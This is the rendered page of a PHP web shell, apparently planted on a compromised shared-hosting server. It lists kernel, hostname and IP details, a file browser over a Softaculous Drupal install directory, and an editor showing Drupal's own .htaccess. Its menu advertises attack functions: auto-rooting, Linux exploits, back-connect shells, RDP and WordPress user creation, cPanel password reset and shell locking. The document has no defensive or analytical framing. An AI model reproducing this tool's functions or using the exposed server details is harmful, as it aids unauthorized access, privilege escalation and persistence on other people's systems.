Linux host17.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 199.188.200.68 | : 216.73.216.167
Cant Read [ /etc/named.conf ]
8.1.33
shipvipnc2024
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
drupalcms /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
685
B
-rw-r--r--
NOTES.txt
1.86
KB
-rw-r--r--
README.txt
278
B
-rw-r--r--
_htaccess
486
B
-rw-r--r--
composer.phar
2.98
MB
-rw-r--r--
drupalcms.sql
4.16
MB
-rw-r--r--
drupalcms.zip
70.26
MB
-rw-r--r--
extend.php
14.84
KB
-rw-r--r--
fileindex.php
278
B
-rw-r--r--
import.php
3.53
KB
-rw-r--r--
info.xml
3.53
KB
-rw-r--r--
install.js
1.33
KB
-rw-r--r--
install.php
10.78
KB
-rw-r--r--
install.xml
1.11
KB
-rw-r--r--
md5
1.05
KB
-rw-r--r--
settings.php
34.26
KB
-rw-r--r--
update_pass.php
541
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# Deny all requests from Apache 2.4+. <IfModule mod_authz_core.c> Require all denied </IfModule> # Deny all requests from Apache 2.0-2.2. <IfModule !mod_authz_core.c> Deny from all </IfModule> # Turn off all options we don't need. Options -Indexes -ExecCGI -Includes -MultiViews # Set the catch-all handler to prevent scripts from being executed. SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006 <Files *> # Override the handler again if we're run later in the evaluation list. SetHandler Drupal_Security_Do_Not_Remove_See_SA_2013_003 </Files> # If we know how to do it safely, disable the PHP engine entirely. <IfModule mod_php.c> php_flag engine off </IfModule>
Close